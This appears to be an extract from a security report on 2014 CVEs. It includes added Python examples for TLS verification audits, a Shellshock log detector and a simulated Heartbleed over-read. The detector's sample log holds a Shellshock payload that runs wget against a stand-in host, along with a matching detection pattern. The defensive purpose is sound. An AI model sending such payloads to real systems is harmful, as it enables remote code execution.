CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
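Four entries in this list are the same client-side TLS mistake in two forms: CVE-2013-2319, CVE-2013-4436 and CVE-2013-6396 accept whatever certificate (or host key) the peer presents, and CVE-2014-2014 verifies correctly but then retries in cleartext when verification fails, which hands an active attacker the credentials anyway. The added example below (written for this appendix, not code from any of the affected projects) shows a client context with verification on and off, a small audit function a reviewer can run against any ssl.SSLContext an application builds, and the downgrade-on-failure pattern beside the correct fail-closed behaviour. The connector callables and host name are constructed stand-ins; nothing touches the network.

```python
import ssl
from typing import Any, Callable, List


def make_client_context() -> ssl.SSLContext:
    """What the fixed clients do: require a chain to a trusted CA and a
    hostname match. create_default_context() sets CERT_REQUIRED,
    check_hostname=True and loads the platform CA store."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # assumption: no legacy peers to support
    return ctx


def make_noverify_context() -> ssl.SSLContext:
    """The CVE-2013-2319 / CVE-2013-6396 behaviour: any certificate is accepted,
    so a man-in-the-middle with a self-signed certificate sees the session."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def audit_context(ctx: ssl.SSLContext) -> List[str]:
    """Return the verification weaknesses present in a client context (empty list = none)."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode is not CERT_REQUIRED: any certificate is accepted")
    if not ctx.check_hostname:
        findings.append("check_hostname is off: a valid certificate for another host is accepted")
    return findings


def login(host: str,
          tls_connect: Callable[[str, ssl.SSLContext], Any],
          plain_connect: Callable[[str], Any],
          fallback_to_cleartext: bool = False) -> Any:
    """Session setup. With fallback_to_cleartext=True this reproduces imapsync's
    pre-1.584 mistake: a verification failure is treated as "no TLS available"
    and the login is retried in the clear. With it off, a failed handshake is an
    error, never a downgrade."""
    try:
        return tls_connect(host, make_client_context())
    except ssl.SSLError:
        if fallback_to_cleartext:
            return plain_connect(host)
        raise


# Constructed connectors for the demonstration: TLS always fails verification,
# as it would with an attacker's certificate in the path.
def fake_tls_connect_fails(host: str, ctx: ssl.SSLContext) -> Any:
    raise ssl.SSLError("certificate verify failed")


def fake_plain_connect(host: str) -> Any:
    return ("cleartext", host)


def credentials_sent_in_clear(fallback_to_cleartext: bool) -> bool:
    """True if, under an active attacker, the login ends up on a cleartext connection."""
    try:
        result = login("imap.example.test", fake_tls_connect_fails, fake_plain_connect,
                       fallback_to_cleartext=fallback_to_cleartext)
    except ssl.SSLError:
        return False
    return result[0] == "cleartext"


if __name__ == "__main__":
    print("verifying context findings:", audit_context(make_client_context()))
    print("no-verify context findings:", audit_context(make_noverify_context()))
    print("downgrade with fallback on:", credentials_sent_in_clear(True))
    print("downgrade with fallback off:", credentials_sent_in_clear(False))
```

The audit function is the useful part for a code review: grep for SSLContext construction (or for verify=False, CERT_NONE and check_hostname=False in library wrappers) and run each context through it, because a library that accepts a context parameter will usually accept a weakened one without complaint.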
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media during 2014 and early 2015.

These are of particular note because, while they may not be the most damaging attack vectors (although some are very serious), they caught the attention of the public, and SMEs would have been under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news because it affected the Linux/Unix server environment and could be exploited remotely with very little effort.

    GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The bug lets an attacker who controls the value of an environment variable passed to bash execute arbitrary shell commands on the target. Bash by itself does not expose that environment to the network; the attack needs another service, such as a CGI script behind a web server, a DHCP client, or a restricted SSH account using ForceCommand, that copies attacker-supplied input into the environment of a bash process. Where that condition holds, however, the results can be devastating, as it lays the entire system open to many other forms of attack.

The threat was particularly insidious for SMEs that used Linux/Unix-based servers for services, mail servers for example, as they would potentially have no idea that they had been compromised.
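The privilege boundary the CVE text describes, a service copying untrusted input into the environment of a bash process, is what makes the bug remotely reachable, and it is also what makes attempts visible in web server logs. The following is an added example, not code from this report: a small Python detector that parses Apache combined-format access log lines and flags requests whose User-Agent, Referer or request line carries the bash function-definition prefix "() {" that every Shellshock exploit has to send. The log lines are constructed for the example, and the header-to-variable mapping (User-Agent to HTTP_USER_AGENT) is the standard CGI one rather than anything the report specifies.

```python
"""Detect Shellshock (CVE-2014-6271) probes in Apache combined-format access logs.

Added example; not code from the Security Lancaster report. A CGI server copies
request headers into the environment of the handler process (User-Agent becomes
HTTP_USER_AGENT, Referer becomes HTTP_REFERER), which is the privilege boundary
the CVE text describes. A vulnerable bash treats any variable whose value starts
with "() {" as an exported function and executes whatever follows the closing
brace, so every Shellshock attempt over HTTP has to carry that prefix.
"""
import re

# Apache "combined" format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Attackers vary the whitespace inside the function prefix, so match loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def cgi_env_name(header: str) -> str:
    """CGI/1.1 mapping of an HTTP header name to its environment variable."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


# Log fields that end up in a CGI program's environment, and where they land.
ENV_SOURCE = {
    "request": "QUERY_STRING / REQUEST_URI",
    "referer": cgi_env_name("Referer"),
    "agent": cgi_env_name("User-Agent"),
}


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None if malformed."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_shellshock_probe(entry: dict) -> bool:
    """True if any environment-bound field carries a bash function definition."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ENV_SOURCE)


def find_probes(lines):
    """Return (source ip, request line, offending field) for each suspect line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for field in ENV_SOURCE:
            if SHELLSHOCK_RE.search(entry[field]):
                hits.append((entry["ip"], entry["request"], field))
                break
    return hits


# Constructed sample log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/status.sh HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \'wget http://203.0.113.9/x -O /tmp/x\'"',
    '198.51.100.7 - - [25/Sep/2014:10:14:05 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [25/Sep/2014:10:14:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '500 0 "() { _; } >_[$($())] { echo vulnerable; }" "curl/7.37.0"',
    'not a log line at all',
]

if __name__ == "__main__":
    for ip, request, field in find_probes(SAMPLE_LOG):
        print(f"{ip} probed via {field} ({ENV_SOURCE[field]}): {request}")
```

Run against a real access log with `find_probes(open("/var/log/apache2/access.log"))`. A hit tells you that a probe arrived, not that it succeeded; a 200 response from a CGI path on a host whose bash predates the fix is the combination that warrants incident response rather than just patching.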
"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to read the active memory of a target machine directly through a buffer over-read. This allowed attackers to access private credentials (or indeed anything else) held in the RAM of the target.

As described in the original CVE report:

    The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, in both the open and closed source worlds, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as yet unpatched servers still online) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on their individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and the other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the means to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
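To make the buffer over-read concrete, here is an added example (not code from the report, and a Python model rather than OpenSSL's C): a heartbeat handler written the way OpenSSL 1.0.1 before 1.0.1g behaved, next to one carrying the bounds check that 1.0.1g added. Process memory is simulated as a byte array in which a constructed placeholder secret sits just after the received record; a request that declares a 65535-byte payload but carries one byte pulls that secret back from the vulnerable version and is silently dropped by the fixed one.

```python
"""Heartbleed (CVE-2014-0160) modelled in Python: vulnerable and hardened handlers.

Added example; not code from the report and not OpenSSL's C. A TLS Heartbeat
message is: type (1 byte) | payload_length (2 bytes, big-endian) | payload |
padding (at least 16 bytes). OpenSSL 1.0.1 before 1.0.1g trusted payload_length
from the peer and copied that many bytes out of its receive buffer, so a
request that declared 65535 bytes but carried one returned ~64 KiB of whatever
followed the record in process memory.
"""
import struct
from typing import Optional

HB_REQUEST = 1
HB_RESPONSE = 2
PADDING = 16            # minimum padding a receiver must tolerate
HEADER = 1 + 2          # type + payload_length


def build_heartbeat(payload: bytes, declared_len: Optional[int] = None) -> bytes:
    """Encode a request; declared_len != len(payload) produces a malicious one."""
    if declared_len is None:
        declared_len = len(payload)
    return struct.pack("!BH", HB_REQUEST, declared_len) + payload + b"\x00" * PADDING


def _echo(payload: bytes) -> bytes:
    return struct.pack("!BH", HB_RESPONSE, len(payload)) + payload + b"\x00" * PADDING


def vulnerable_handler(memory: bytearray, record_len: int) -> bytes:
    """Pre-1.0.1g behaviour: copy payload_length bytes without comparing it to
    record_len. `memory` is the receive buffer plus whatever happens to follow
    it on the heap; the received record occupies memory[:record_len]."""
    hb_type, payload_len = struct.unpack("!BH", bytes(memory[:HEADER]))
    if hb_type != HB_REQUEST:
        return b""
    # memcpy(bp, pl, payload): the read runs past the end of the record
    return _echo(bytes(memory[HEADER:HEADER + payload_len]))


def hardened_handler(memory: bytearray, record_len: int) -> bytes:
    """1.0.1g behaviour: silently discard a record whose declared payload plus
    header and minimum padding exceeds the bytes actually received."""
    if record_len < HEADER + PADDING:
        return b""
    hb_type, payload_len = struct.unpack("!BH", bytes(memory[:HEADER]))
    if hb_type != HB_REQUEST:
        return b""
    if HEADER + payload_len + PADDING > record_len:
        return b""          # the Heartbleed bounds check
    return _echo(bytes(memory[HEADER:HEADER + payload_len]))


def leaked_bytes(response: bytes, sent_payload: bytes) -> bytes:
    """Bytes in the response beyond what the client legitimately sent."""
    if not response:
        return b""
    _, n = struct.unpack("!BH", response[:HEADER])
    return response[HEADER:HEADER + n][len(sent_payload):]


# Constructed stand-in for data that happened to sit next to the record on the
# heap (session keys, cookies, a private key); not a real key.
SECRET = b"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA(placeholder)\n"


def demo(declared_len: Optional[int]):
    """Run both handlers on one request; return (leak_vulnerable, leak_hardened)."""
    request = build_heartbeat(b"A", declared_len)
    memory = bytearray(request + SECRET + bytes(65536))   # 64 KiB of heap after it
    vuln = vulnerable_handler(memory, len(request))
    safe = hardened_handler(memory, len(request))
    return leaked_bytes(vuln, b"A"), leaked_bytes(safe, b"A")


if __name__ == "__main__":
    leak, _ = demo(65535)
    print(f"vulnerable handler returned {len(leak)} extra bytes; "
          f"secret present: {SECRET in leak}")
```

The point the model makes for patch management is that the bug is one missing comparison in the server, so nothing a client or a firewall does changes the outcome; only replacing the library on the host that terminates TLS removes it, which is why the preceding paragraph matters for SMEs that do not operate that host.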
"Superfish"

